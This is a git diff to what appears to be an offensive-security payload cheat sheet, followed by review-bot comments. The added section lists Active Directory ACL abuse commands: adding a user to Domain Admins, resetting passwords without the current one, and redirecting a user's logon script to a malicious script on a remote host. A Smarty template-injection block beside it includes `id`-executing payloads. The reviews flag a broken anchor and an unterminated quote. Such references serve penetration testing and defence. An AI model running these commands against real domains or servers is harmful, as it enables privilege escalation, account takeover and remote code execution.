diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 708add14..e7a3252c 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -44,6 +44,7 @@ - [Drop the MIC](#drop-the-mic) - [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) + - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-acls-aces) - [Trust relationship between domains](#trust-relationship-between-domains) - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) - [Unconstrained delegation](#unconstrained-delegation) 
@@ -985,6 +986,15 @@ or ([adsisearcher]"(AdminCount=1)").findall() ``` +### Abusing Active Directory ACLs/ACEs + +* **GenericAll on User** : We can reset user's password without knowing the current password +* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : `net group "domain admins" spotless /add /domain` +* **WriteProperty on Group** : We can again add ourselves to the Domain Admins group and escalate privileges: `net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain` +* **Self (Self-Membership) on Group** : Another privilege that enables the attacker adding themselves to a group +* **ForceChangePassword** : we can reset the user's password without knowing their current password: `$c = Get-Credential;Set-DomainUserPassword -Identity changeme -AccountPassword $c.Password -Verbose` +* **GenericWrite on User** : WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1` + ### Trust relationship between domains ```powershell diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index d8101f9e..9e6fa845 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -153,6 +153,7 @@ $output = $twig > render ( ## Smarty ```python +{$smarty.version} {php}echo `id`;{/php} {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())} ```
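Review bot: In the first hunk (the table of contents at @@ -44,6 +44,7 @@), the new anchor `#abusing-active-directory-acls-aces` will not resolve on GitHub: the slug generator drops `/` instead of turning it into a hyphen, so the heading "### Abusing Active Directory ACLs/ACEs" added later in the same file gets the id `abusing-active-directory-aclsaces`. Either point the link at `(#abusing-active-directory-aclsaces)` or rename the heading to "ACLs and ACEs", so the entry keeps working like the surrounding TOC lines.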
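Review bot: In the @@ -985,6 +986,15 @@ hunk the last bullet carries an unterminated string: `-PropertyValue "\\10.0.0.5\totallyLegitScript.ps1` has no closing quote, so the command cannot even be parsed as written. The bullets also never say which tool supplies `Add-NetGroupUser`, `Set-DomainUserPassword` and this `-SamAccountName`/`-PropertyName`/`-PropertyValue` form of `Set-ADObject`; none of these signatures belong to the RSAT ActiveDirectory module (they match PowerView's), so a one-line lead-in naming the module, and stating that `spotless`, `delegate`, `changeme` and `offense.local` are lab placeholders carried over from the source, would stop readers from pasting them into a real domain. Minor: "Self (Self-Membership) on Group" is the only entry with no accompanying command, and "GenericAll on User" and "ForceChangePassword" describe the same password-reset outcome; fold the two or cross-reference them so the list reads as one right per bullet.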
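Review bot: In the Smarty hunk (@@ -153,6 +153,7 @@), the added `{$smarty.version}` line lands unlabelled above the existing `{php}` entries, so it reads as a third payload when it is only a version-disclosure probe that confirms the engine is Smarty before anything else is tried; give it its own comment or sub-heading ("Fingerprint: prints the Smarty version") so the detection step is distinguishable from the code-execution lines. While touching this block, the surrounding fence is tagged `python` although the contents are Smarty template syntax; `smarty` or `html` would avoid misleading highlighting.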